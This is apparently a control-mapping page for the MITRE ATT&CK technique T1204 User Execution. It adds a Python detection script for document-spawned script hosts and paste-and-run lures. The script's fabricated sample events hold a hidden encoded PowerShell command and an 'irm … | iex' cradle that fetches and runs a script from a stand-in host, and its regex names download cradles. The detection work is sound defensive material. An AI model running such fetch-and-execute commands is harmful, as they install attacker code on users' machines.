T1204 User Execution

An adversary may rely upon specific actions by a user in order to gain execution. Users may be subjected to social engineering to get them to execute malicious code by, for example, opening a malicious document file or link. These user actions will typically be observed as follow-on behavior from forms of Phishing.

While User Execution frequently occurs shortly after Initial Access it may occur at other phases of an intrusion, such as when an adversary places a file in a shared directory or on a user's desktop hoping that a user will click on it. This activity may also be seen shortly after Internal Spearphishing.

Adversaries may also deceive users into performing actions such as:

  • Enabling Remote Access Software, allowing the adversary direct control of the system
  • Running malicious JavaScript in their browser, allowing adversaries to Steal Web Session Cookies (Citation: Talos Roblox Scam 2023)(Citation: Krebs Discord Bookmarks 2023)
  • Downloading and executing malware for User Execution
  • Coercing users to copy, paste, and execute malicious code manually (Citation: Reliaquest-execution)(Citation: proofpoint-selfpwn)

For example, tech support scams can be facilitated through Phishing, vishing, or various forms of user interaction. Adversaries can use a combination of these methods, such as spoofing and promoting toll-free numbers or call centers that are used to direct victims to malicious websites, to deliver and execute payloads containing malware or Remote Access Software.(Citation: Telephone Attack Delivery)
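Two of the patterns above leave a distinctive shape in process-creation telemetry: a malicious document causes a document reader to spawn a script host, and a "copy, paste and run" lure causes explorer.exe (the Win+R or shell prompt the user pasted into) to spawn a shell whose command line carries a download cradle, an encoded payload or a hidden window. The following is an added example, not code from MITRE ATT&CK or from any vendor control mapped on this page: it runs that detection logic over constructed Sysmon-style Event ID 1 records (field names ParentImage, Image, CommandLine, User). The sample events are fabricated, and the process lists and command-line regex are illustrative assumptions to be tuned for a given estate.

```python
"""Detection of T1204 user-execution patterns over constructed process-creation events.

Example added for this page; not MITRE ATT&CK or vendor code. Field names follow
Sysmon Event ID 1 (ParentImage, Image, CommandLine, User). Sample events are
fabricated and the process lists / regex are illustrative assumptions.
"""
import json
import re
from typing import List, Optional, Tuple

# Document readers whose child processes should never be script hosts (assumed list).
DOCUMENT_READERS = {
    "winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe",
    "acrord32.exe", "acrobat.exe", "onenote.exe",
}
# Interpreters and LOLBins a malicious document typically spawns (assumed list).
SCRIPT_HOSTS = {
    "cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe",
    "mshta.exe", "rundll32.exe", "regsvr32.exe", "certutil.exe",
}
# Paste-and-run lures: parent is explorer.exe (Win+R / shell prompt), child is a
# shell, and the command line shows a cradle, an encoded script or a hidden window.
PASTE_RUN_HOSTS = {"cmd.exe", "powershell.exe", "pwsh.exe", "mshta.exe"}
SUSPICIOUS_CMDLINE = re.compile(
    r"(-enc(odedcommand)?\s+[A-Za-z0-9+/=]{16,}"  # base64-encoded PowerShell
    r"|-e\s+[A-Za-z0-9+/=]{16,}"
    r"|downloadstring|invoke-webrequest|\biwr\b|\birm\b|\bcurl\b"  # download cradles
    r"|mshta\s+https?://"
    r"|-w(indowstyle)?\s+hidden)",
    re.IGNORECASE,
)

VERDICT_DOCUMENT = "T1204.002: document reader spawned a script host"
VERDICT_PASTE_RUN = "T1204: paste-and-run lure (explorer -> shell with download/encoded command)"

# Constructed Sysmon-style events (NOT real telemetry), one JSON object per line.
SAMPLE_EVENTS = r'''
{"UtcTime": "2024-05-01 10:02:11", "User": "CORP\\alice", "ParentImage": "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE", "Image": "C:\\Windows\\System32\\cmd.exe", "CommandLine": "cmd.exe /c powershell -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"}
{"UtcTime": "2024-05-01 10:09:43", "User": "CORP\\bob", "ParentImage": "C:\\Windows\\explorer.exe", "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "CommandLine": "powershell -w hidden -c \"irm https://example.invalid/verify.ps1 | iex\""}
{"UtcTime": "2024-05-01 10:11:05", "User": "CORP\\bob", "ParentImage": "C:\\Windows\\explorer.exe", "Image": "C:\\Windows\\System32\\notepad.exe", "CommandLine": "notepad.exe C:\\Users\\bob\\notes.txt"}
{"UtcTime": "2024-05-01 10:15:27", "User": "CORP\\carol", "ParentImage": "C:\\Windows\\explorer.exe", "Image": "C:\\Windows\\System32\\cmd.exe", "CommandLine": "cmd.exe /k cd C:\\Users\\carol\\src"}
{"UtcTime": "2024-05-01 10:20:00", "User": "CORP\\alice", "ParentImage": "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE", "Image": "C:\\Windows\\splwow64.exe", "CommandLine": "C:\\Windows\\splwow64.exe 12288"}
'''


def _basename(path: str) -> str:
    """Lower-cased file name from a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(event: dict) -> Optional[str]:
    """Return a verdict for one process-creation event, or None if it looks benign."""
    parent = _basename(event.get("ParentImage", ""))
    child = _basename(event.get("Image", ""))
    cmdline = event.get("CommandLine", "")
    if parent in DOCUMENT_READERS and child in SCRIPT_HOSTS:
        return VERDICT_DOCUMENT
    if parent == "explorer.exe" and child in PASTE_RUN_HOSTS and SUSPICIOUS_CMDLINE.search(cmdline):
        return VERDICT_PASTE_RUN
    return None


def scan(jsonl: str) -> List[Tuple[str, str, str]]:
    """Run classify() over newline-delimited JSON events; return (user, child, verdict) hits."""
    hits = []
    for line in jsonl.strip().splitlines():
        event = json.loads(line)
        verdict = classify(event)
        if verdict:
            hits.append((event.get("User", "?"), _basename(event.get("Image", "")), verdict))
    return hits


if __name__ == "__main__":
    for user, child, verdict in scan(SAMPLE_EVENTS):
        print(f"{user:<12} {child:<16} {verdict}")
```

Of the five constructed events only the first two fire: WINWORD.EXE launching cmd.exe, and explorer.exe launching PowerShell with a hidden window and an `irm ... | iex` cradle. A user opening cmd.exe from explorer.exe to change directory, or Word spawning the print helper splwow64.exe, is left alone, which is why the explorer.exe rule requires a command-line indicator rather than firing on parent/child alone.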


CRI Profile Mappings

Capability ID | Capability Description | Mapping Type | ATT&CK ID | ATT&CK Name | Notes
DE.AE-02.01 | Event analysis and detection | Mitigates | T1204 | User Execution |
  Comments: This diagnostic statement provides for the implementation of methods to block similar future attacks via security tools such as antivirus and IDS/IPS, providing protection against threats and exploitation attempts.
DE.CM-01.01 | Intrusion detection and prevention | Mitigates | T1204 | User Execution |
  Comments: To protect users from becoming victims of social engineering attacks, network intrusion prevention techniques can be used to scan for and block malicious code from malicious downloads and malicious activity.
PR.PS-01.03 | Configuration deviation | Mitigates | T1204 | User Execution |
  Comments: This diagnostic statement provides protection from User Execution through the implementation of security configuration baselines for OS and software, file integrity monitoring and imaging. Security baselining and integrity checking can help protect against adversaries attempting to execute malicious unsigned code.
PR.PS-01.09 | Virtualized end point protection | Mitigates | T1204 | User Execution |
  Comments: The diagnostic statement highlights several mechanisms that organizations can implement to protect endpoint systems using virtualization technologies, essentially hypervisor hardening. With this technique, adversaries may use an existing VM leveraging a legitimate external Web service to exfiltrate data rather than their primary command and control channel. The use of hypervisor application control may detect and block this type of behavior.
DE.CM-01.05 | Website and service blocking | Mitigates | T1204 | User Execution |
  Comments: This diagnostic statement protects against User Execution through the implementation of tools and measures to block unknown or unused files in transit.
PR.PS-01.09 | Virtualized end point protection | Mitigates | T1204 | User Execution |
  Comments: The diagnostic statement highlights several mitigating controls that organizations can implement to protect endpoint systems using virtualization technologies. Adversaries may rely on a user running a malicious image to facilitate execution. This can lead to the execution of malicious code, such as cryptocurrency mining, in the virtualized instance or container. Controls such as execution prevention, NIPS, EDR and behavior prevention on endpoints can stop executables originating in virtual machines from running on the host or network.
PR.IR-01.03 | Network communications integrity and availability | Mitigates | T1204 | User Execution |
  Comments: This diagnostic statement protects against User Execution through the use of secure network configurations, architecture, implementations of zero trust architecture, and segmentation.

NIST 800-53 Mappings

VERIS Mappings

Capability ID | Capability Description | Mapping Type | ATT&CK ID | ATT&CK Name | Notes
action.malware.variety.Other | Other | related-to | T1204 | User Execution |
action.malware.variety.Downloader | Downloader (pull updates or other malware) | related-to | T1204 | User Execution |
action.social.variety.Phishing | Any type of *ishing. Phishing always involves getting data from the victim. Phishing usually has some element of pretexting, but often it doesn’t rise to the level of an invented scenario. E.g. a fake Google login page isn’t really pretexting. | related-to | T1204 | User Execution |
action.social.vector.Email | Email | related-to | T1204 | User Execution |
action.social.vector.Social media | Social media or networking | related-to | T1204 | User Execution |

Azure Mappings

Capability ID | Capability Description | Mapping Type | ATT&CK ID | ATT&CK Name | Notes
alerts_for_windows_machines | Alerts for Windows Machines | technique_scores | T1204 | User Execution |
  Comments: This control provides detection for one of the two sub-techniques of this technique, Malicious File, resulting in a Partial coverage score and consequently an overall score of Partial.
azure_firewall | Azure Firewall | technique_scores | T1204 | User Execution |
  Comments: This control provides partial protection for this technique.
azure_network_watcher_traffic_analytics | Azure Network Watcher: Traffic Analytics | technique_scores | T1204 | User Execution |
  Comments: This control can detect network traffic associated with this technique.
defender_for_app_service | Microsoft Defender for Cloud: Defender for App Service | technique_scores | T1204 | User Execution |
defender_for_containers | Microsoft Defender for Containers | technique_scores | T1204 | User Execution |
  Comments: This control can detect container behavior associated with this technique.
microsoft_antimalware_for_azure | Microsoft Antimalware for Azure | technique_scores | T1204 | User Execution |

GCP Mappings

Capability ID | Capability Description | Mapping Type | ATT&CK ID | ATT&CK Name | Notes
google_secops | Google Security Operations | technique_scores | T1204 | User Execution |
  Comments: Google Security Ops is able to trigger an alert based on suspicious user activity (e.g., clicking on malicious links). This technique was scored as Minimal based on a low or uncertain detection coverage factor.
  References:
    https://github.com/chronicle/detection-rules/blob/783e0e5947774785db1c55041b70176deeca6f46/soc_prime_rules/threat_hunting/proxy/microsoft_teams_phishing_email.yaral
    https://github.com/chronicle/detection-rules/blob/783e0e5947774785db1c55041b70176deeca6f46/soc_prime_rules/threat_hunting/process_creation/detect_possible_execution_of_phishing_attachment.yaral

AWS Mappings

Capability ID | Capability Description | Mapping Type | ATT&CK ID | ATT&CK Name | Notes
aws_config | AWS Config | technique_scores | T1204 | User Execution |
  Comments: This control provides significant coverage for one of this technique's sub-techniques, resulting in an overall score of Minimal.

ATT&CK Subtechniques

Technique ID | Technique Name | Number of Mappings
T1204.001 | Malicious Link | 20
T1204.002 | Malicious File | 21
T1204.003 | Malicious Image | 31